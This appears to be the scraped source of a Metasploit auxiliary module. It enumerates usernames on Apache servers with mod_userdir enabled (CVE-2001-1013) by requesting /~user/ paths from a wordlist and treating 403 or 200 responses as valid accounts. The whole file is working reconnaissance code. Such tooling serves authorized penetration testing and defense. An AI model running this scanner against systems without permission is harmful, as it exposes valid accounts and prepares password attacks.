Path: blob/master/modules/auxiliary/scanner/http/apache_userdir_enum.rb
19611 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::HttpClient7include Msf::Auxiliary::Report8include Msf::Auxiliary::Scanner9include Msf::Auxiliary::AuthBrute1011def initialize12super(13'Name' => 'Apache "mod_userdir" User Enumeration',14'Description' => %q{Apache with the UserDir directive enabled generates different error15codes when a username exists and there is no public_html directory and when the username16does not exist, which could allow remote attackers to determine valid usernames on the17server.},18'Author' => [19'Heyder Andrade <heyder.andrade[at]alligatorteam.org>',20],21'References' => [22['BID', '3335'],23['CVE', '2001-1013'],24['OSVDB', '637'],25],26'License' => MSF_LICENSE27)2829register_options(30[31OptString.new('TARGETURI', [true, 'The path to users Home Page', '/']),32OptPath.new('USER_FILE', [33true, "File containing users, one per line",34File.join(Msf::Config.data_directory, "wordlists", "unix_users.txt")35]),36]37)3839deregister_options(40'PASSWORD',41'PASS_FILE',42'USERPASS_FILE',43'STOP_ON_SUCCESS',44'BLANK_PASSWORDS',45'USER_AS_PASS'46)47end4849def run_host(ip)50@users_found = {}5152each_user_pass { |user, pass|53do_login(user)54}5556if (@users_found.empty?)57print_status("#{full_uri} - No users found.")58else59print_good("#{full_uri} - Users found: #{@users_found.keys.sort.join(", ")}")60report_note(61:host => rhost,62:port => rport,63:proto => 'tcp',64:sname => (ssl ? 'https' : 'http'),65:type => 'users',66:data => { :users => @users_found.keys.join(", ") }67)68end69end7071def do_login(user)72vprint_status("#{full_uri}~#{user} - Trying UserDir: '#{user}'")73uri = normalize_uri(target_uri.path)74payload = "#{uri}~#{user}/"75begin76res = send_request_cgi!(77{78'method' => 'GET',79'uri' => payload,80'ctype' => 'text/plain'81}, 2082)8384return unless res8586if ((res.code == 403) or (res.code == 200))87print_good("#{full_uri} - Apache UserDir: '#{user}' found ")88@users_found[user] = :reported89else90vprint_status("#{full_uri} - Apache UserDir: '#{user}' not found ")91end92rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout93rescue ::Timeout::Error, ::Errno::EPIPE94end95end96end979899